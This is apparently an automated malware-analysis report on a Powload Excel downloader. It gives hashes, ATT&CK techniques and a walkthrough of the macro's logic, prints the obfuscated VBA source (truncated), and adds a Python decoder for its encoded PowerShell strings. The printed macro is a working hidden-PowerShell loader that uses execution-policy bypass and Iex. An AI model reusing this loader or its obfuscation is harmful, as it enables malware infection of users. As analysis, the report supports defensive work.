Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 6602f118eea649f8…

Verdict: MALICIOUS
File type: Office (OLE)
Size: 137.5 KB
Created: 2019-02-15 12:29:11
Authoring application: Microsoft Excel
First seen: 2019-02-26
MD5: a9dca658ba431a4123be8aa3f13284bc
SHA-1: f5925d14b445ffcd29b72c70e7682b07ba5dad6b
SHA-256: 6602f118eea649f863e5662671686a3ae5e1067e1c1bcbed829d7ba8ab3390f6
Risk score: 182

Malware Insights

MITRE ATT&CK
T1059.005 Command and Scripting Interpreter: Visual Basic
T1059.001 Command and Scripting Interpreter: PowerShell
T1027 Obfuscated Files or Information
T1566.001 Phishing: Spearphishing Attachment

The file is an Excel workbook whose VBA project defines a Workbook_Open handler. The handler compares Len(Select_t), where Select_t returns the locale-dependent string Format(0, "currency"), with the Office enumeration constant msoContactCardTypeUnknownContact and calls Application.Quit on a mismatch, so whether the payload branch is reached depends on the regional settings of the host; a detonation that ends with Excel quitting is this guard firing, not a benign document. On the other branch FullCalculations() calls Shell() with window style xlExponential - 5, which evaluates to 0 (vbHide), on a string assembled from three parts: a prefix and a suffix passed through the helper yoo() (its body is truncated in the listing, but every character of its arguments is one code point above the intended text), and a PowerShell composite format string (the "{…}{29}{19}…" -f '…','…' construct in Text_text, with placeholders numbered up to {101}) whose arguments are base64 fragments spread over Text_text, Math_func, Appersands and ByVals. Undoing the shift exposes, with the first and last tokens of each piece out of place (so yoo() also moves a fragment), a cmd /c "set ladnI=…" command that base64-decodes and Deflate-decompresses the reassembled fragments, executes the result through $ENV:comsPEc[4,24,25]-JoiN'' (the characters I, e and x of the default %ComSpec%, i.e. Iex), then runs Set Zgo=pOWErSHElL -EXeCut BYpASs -noninTErA -NoLo -noPr -W 1 … && cmd /c %Zgo%, where the PowerShell invokes ChiLdItEm on ENv:LadNI (resolved by PowerShell to Get-ChildItem) and pipes the variable's value into another Iex built with -f. The second stage is the compressed blob itself: the extracted macro contains no plaintext download URL, so any C2 address has to come from decompressing the reassembled fragments or from dynamic analysis, not from this listing. ClamAV identifies the sample as Xls.Malware.Powload-6862214-0.

Heuristics 5

  • ClamAV: Xls.Malware.Powload-6862214-0 [critical] CLAMAV_DETECTION
    ClamAV detected this file as malware: Xls.Malware.Powload-6862214-0
  • VBA macros detected [medium] OLE_VBA_MACROS (2 related findings)
    Document contains VBA macro code
  • Shell() call in VBA [critical] OLE_VBA_SHELL
    The macro passes a string to Shell(), i.e. it launches an external process; here the string is an obfuscated cmd /c … command and the window-style argument evaluates to vbHide
  • Workbook_Open macro [high] OLE_VBA_WBOPEN
    Workbook_Open runs as soon as the document is opened with macros enabled, with no further user interaction
  • Suspicious extracted artifact [info] EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 7991 bytes
SHA-256: 68832d0503dfa21580ffb93cd714cb2935734c307655bb9596b92f61decbe907
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 6 long base64-like blob(s).
Preview of the extracted script (first 1,000 lines):
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Function Select_t()
Select_t = Format(0, "currency")
End Function
Function Teams()
Teams = yoo(")#|9!!0d!#tfu!!mbeoJ>!/!)!%FOW;dpntQFd\5-35-36^.KpjO((*)OFx.PCKFDU!!tztUfN/JP/dPnQSFttJPo/eFgmbUFtUsFBn)\tZtufn/Jp/NfnpSztusfBN^!\dPoWfSu^;;gsPncbtF75TuSjoh)!dne")
End Function
Function Drawiiiingsimg()
Drawiiiingsimg = yoo("&{hp&#!*-\TztuFN/JP/DPNqSftTJpO/dPNqSfttJPonPef^;;eFdpNQsFTT!*!_}gPsfBdi|OFx.PCKFDU!!tztuFn/jP/tUsfbNSFBEFs)!%`!-!\tZtUfN/ufyu/foDpejoh^;;bTDJj!*~_}gpSFbdi!|%`/SfbeupFOE)*~*!''Tfu!![hp>qPXFsTIFmM!!.FYfDvu!!CZqBTt!!.opojoUFsB!.OpMp!.opQs!.X!2!!!!)/)!!]#|2~|1~|3~]#!.g!(uF(-(DijMeJ(-(n(!!*!)!]#|1~|2~]#!.g!(FOw;(-(MbeOJ(!!*!*/]#wBaMvf]#!!___}___'!)]#|2~|1~]#.g!(y(-(Jf(!!*''!!dne!!0d!QG(*")
End Function
Sub Workbook_Open()
If Len(Select_t) = msoContactCardTypeUnknownContact Then FullCalculations Else Application.Quit
End Sub
Sub FullCalculations()
ChangeSheets = Shell#(Teams + Quit_Quit & Drawiiiingsimg, xlExponential - 5)
End Sub
Function Text_text()
Text_text = "2}{29}{19}{50}{59}{90}{84}{83}{17}{89}{68}{21}{87}{75}{24}{32}{93}{36}{80}{40}{35}{64}{42}{25}{61}{31}{71}{10}{73}{57}{54}{60}{72}{5}{86}{33}{76}{69}{38}{18}{30}{49}{74}{53}{39}{16}{0}{52}{98}{15}{101}{91}{48}{9}{100}{78}{37}{97}{56}{13}{43}{11}{2}{41}{88}{27}{1}{94}{12}{8}{55}{14}{70}{45}{44}{22}{46}{65}{62}{85}{79}{34}{7}{77}{67}{81}{66}{58}{23}{99}{95}{92}{63}{4}{96}{20}{51}{28}{6}{47}{26}{3}"" -f'Wd95+YpnMzWMtgu73X/dtmbSM37H3srtd7Sq/mnDn1zPZ+/fSRwqaRSwEVHJXTJ22mR7','3WQT0x415vvU59S7f4gY8/aE0Ii6pULXRKz01cWuAYSsPcYooW6E','NCW+iuUCMMK48tyJFXJORCY3t30h4Yo7E+waMmnQrqj1BW7oLrPoQvMbP/SQq','sAmICZnvf7/wc=','YnvaW','y2r7Vh9/uBn6','IlCvR+g7b/aDThV','y+I8pvtQBW','QHfRkkW000WRy8Ry0XbzY7Onu1CECz9eJOVl5tFEmlPMwdBDZ+lCou63X02HdJO1U2jCN/DxD3ZXrK/mLrL9txxUUSZSnaai4I0FhCdVZTzN8ncW44DgA','vYXBM5kMqn','cUOXxcjiDN3qAnjgUBMtqOKpLo6J','GNbnLCZeYjV16RnfyKnGN+mF0+7C6e7HUi5ty6xZIo5krFEkptzxN+wsPWaP1cFvm5eRTxdyLeFIUb','mJef+OO/D1i4x3Nvi','DFoy+a6Nilj5y"
Text_text = Text_text & "jFt1N1HshvCQ7V4yRaIMnCOBi5roEH6vtVWAjETxElh6+PLlYifTeWv/GfcqsXPfHD83ZjtWDruXOSEhdyMWbnBnD+4p3P','iV7EkrYmL9y9h9+AKMS5vLzFU+B9FJlkuLJQa7Q+83qN6','8BaoASTKJUwc8+jPvr01o','nvaVcFMbDKfsea/LswQCk02fkGfw7g8BzpV+ryB+aI62p+OpS','4a4AxSJMleA5B2BlZBuoITRQvUVBkUUYCwiK+sP5wj6dun5MXZK31+XH9++/82JofxL3d9N/0sPXl5F3nJThloxXHcZnNvHBU7ZEGsGTgq8qm2TwjdP','EPCciNSfwQ8xUfYwAW5ZQkvq3Lv6xs33DRP/YKfz33L9KElgtmd1f85CWZfaqMTxGqvImuhr6YXUCXF1XiVgfv4NpWr5+Cj9ZCtIKk40yTWnEzUo8fxYIHq+Hzn1/mbc','jHq8b+/3TOoiXt57lWnDhUcmOnu6Xs3kwfDfQxcO/bnsyyJIjecBJsvv/6aDujcctJ','l89RBa8ZQ5NSTFjgF9OKOVTUvp64k1c8Ri5l9Qj64n8yWuUFxSgWdcS8FiZr8H0mCYyFX6YNgfOjuJqN3w05w/','3grFGag3SW0tNopSJ6UmPR','qfsYcTCDyq8cTKWKOdlQU4nSV2IJwaYhJfKZkEmWEJM8lWTMJM','5RD7qCvbzVVaqnqmk8PBcwGYKZhXIfIYS0fu51lWwvb3YbanZ2H9mwEhX7mim','5UYFeLwfCMFjyspVVCbU3kA','bg9epowYvk6AZTNRaYTQE','033194TqcMGRD0BB','+T1WL7D+mTjP3Mn2195mL','UyhQr1pF','rc6LM0n/FsvI+iWc3BrxFn639MCCiRjEgXlNbZxAIkoC6g','C1bjsEzGub4wFDTRnkEenRlV','ww3yrv+zr5wRwbesRhqZXlNOmwdsCC"
End Function
Function Quit_Quit()
Quit_Quit = Text_text & Math_func$ + Appersands & ByVals$
End Function
Function Math_func$()
Math_func = "EUxXW7Mn1QkcGOLWM7A2cFaTvCb80Bpb9nt','mkTskJpWx5XZQtARkR+Jm0PlFVVy','B2opun5OiapArBMJKkLTBuKJskw6h56cVfVkVahKq2VjgyCw8jFhOdEB6SOoKgYpuJ+wFXPr5','5nCCk8+GGaZG7XpE+3cdZgYNUKDrgJ','AEzE','/HRMmweEOU1+YqjsiZbHNU1KYOmAT3X/DoeaAJRjMANFdIKNWGSB/nzwdZR+wDAH+JW0BQnM2MxGfRW','A5pjseDDC2A4uM6mry06IAyMtMup5pJ66RKGeXP','CUlMk5I7TUu6FIMKQgmJVZYxgfYAkvQuiRhhECeCIgq','VPA+UYyTih','ts28ny+B8rFy0NyT49A3kEc2','3W58BIyARk5fvxe4bIIyfE9E6vEtSsmumXCvdz9e54oJ7w5CgUb+7izcCOO7bJ0UCnykIe7wNiIQNL','x','MoBkLZib9l02IFT5v80PJQ9mkcL369wZnQgp+ZmF3MEN','Sc5Cti91SpkO6FUChnkJNKo1MpZu+4uxX','oNeiJOIviHGxM2w6HAtneudpI38IKR7fBWaCHNu5C9uiPOjULGpQMIyiF/gpV100yFE449HOlSswc5IcXpj2GesXuwXznY8XuxjEjZg3vFK','J4buHCJkZLvKVO
... (truncated)
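The two yoo()-wrapped literals from Teams() and Drawiiiingsimg() decoded, as an added example that is not part of the report or of the sample's own code: every character of the literals is shifted down one code point (yoo() itself is cut off in the listing, so the shift is inferred from the fact that it yields readable PowerShell), and the small "{1}{0}{2}" -f '…' expressions inside the result are resolved the way PowerShell's -f operator does. The names shift_decode, resolve_formats, comspec_index and decode_macro_strings are chosen here, and the %ComSpec% path is the assumed Windows default. The helper deliberately does not reconstruct the token reordering that yoo() also performs (the decoded prefix starts with ("{8 and ends with cmd), because that part of the macro is not on the page.

```python
import re

# The two yoo()-wrapped literals, copied verbatim from Teams() and
# Drawiiiingsimg() in the extracted macro (raw strings: the backslashes
# and backticks are part of the data, and neither literal contains '"').
TEAMS_ENC = r")#|9!!0d!#tfu!!mbeoJ>!/!)!%FOW;dpntQFd\5-35-36^.KpjO((*)OFx.PCKFDU!!tztUfN/JP/dPnQSFttJPo/eFgmbUFtUsFBn)\tZtufn/Jp/NfnpSztusfBN^!\dPoWfSu^;;gsPncbtF75TuSjoh)!dne"
DRAW_ENC = r"&{hp&#!*-\TztuFN/JP/DPNqSftTJpO/dPNqSfttJPonPef^;;eFdpNQsFTT!*!_}gPsfBdi|OFx.PCKFDU!!tztuFn/jP/tUsfbNSFBEFs)!%`!-!\tZtUfN/ufyu/foDpejoh^;;bTDJj!*~_}gpSFbdi!|%`/SfbeupFOE)*~*!''Tfu!![hp>qPXFsTIFmM!!.FYfDvu!!CZqBTt!!.opojoUFsB!.OpMp!.opQs!.X!2!!!!)/)!!]#|2~|1~|3~]#!.g!(uF(-(DijMeJ(-(n(!!*!)!]#|1~|2~]#!.g!(FOw;(-(MbeOJ(!!*!*/]#wBaMvf]#!!___}___'!)]#|2~|1~]#.g!(y(-(Jf(!!*''!!dne!!0d!QG(*"

# Assumed value of %ComSpec% on a default English Windows install.
DEFAULT_COMSPEC = r"C:\WINDOWS\system32\cmd.exe"

# A PowerShell composite-format expression, e.g.  "{1}{0}{2}" -f 'tE','ChiLdI','m'
# The quotes may appear as \" because the expression sits inside cmd /c "...".
FMT_RE = re.compile(
    r"""\\?"((?:\{\d+\})+)\\?"\s*-f\s*('[^']*'(?:\s*,\s*'[^']*')*)"""
)


def shift_decode(s: str, delta: int = -1) -> str:
    """Undo the per-character code-point shift applied by yoo().

    yoo() is cut off in the listing; a shift of one is inferred because
    applying it turns the literals into readable PowerShell.
    """
    return "".join(chr(ord(c) + delta) for c in s)


def powershell_format(fmt: str, args: list) -> str:
    """Resolve {n} placeholders the way PowerShell's -f operator does."""
    return re.sub(r"\{(\d+)\}", lambda m: args[int(m.group(1))], fmt)


def resolve_formats(text: str) -> str:
    """Replace each "{..}" -f '..','..' expression with the literal it builds."""
    def repl(m):
        args = re.findall(r"'([^']*)'", m.group(2))
        return "'" + powershell_format(m.group(1), args) + "'"
    return FMT_RE.sub(repl, text)


def comspec_index(indices, comspec: str = DEFAULT_COMSPEC) -> str:
    """Evaluate $ENV:ComSpec[i,j,k] -join '' for the given index list."""
    return "".join(comspec[i] for i in indices)


def decode_macro_strings() -> dict:
    """Shift-decode both literals and resolve the -f expressions inside them.

    The fragment reordering that yoo() also performs (the decoded prefix
    starts with ("{8 and ends with cmd) is not reconstructed here, because
    that code is not on the page.
    """
    return {
        "Teams": resolve_formats(shift_decode(TEAMS_ENC)),
        "Drawiiiingsimg": resolve_formats(shift_decode(DRAW_ENC)),
    }


if __name__ == "__main__":
    for name, text in decode_macro_strings().items():
        print(f"--- {name} ---\n{text}\n")
    # The cmd /c line spells its Invoke-Expression out of %ComSpec%.
    print("$ENV:comsPEc[4,24,25]-JoiN'' ->", comspec_index((4, 24, 25)))
```

Running it prints the decoded prefix (the cmd /c "set ladnI=…" command with its DeflateStream/FromBase64String chain) and the decoded suffix, in which the three -f expressions collapse to 'ChiLdItEm', 'ENv:LadNI' and 'Iex'. The base64 fragments that feed the big format string are spread across functions the listing truncates, so the compressed second stage cannot be rebuilt from this page; the same two helpers, applied to a complete macro dump, are what you would use to reassemble it before inflating it with zlib.decompress(data, -15).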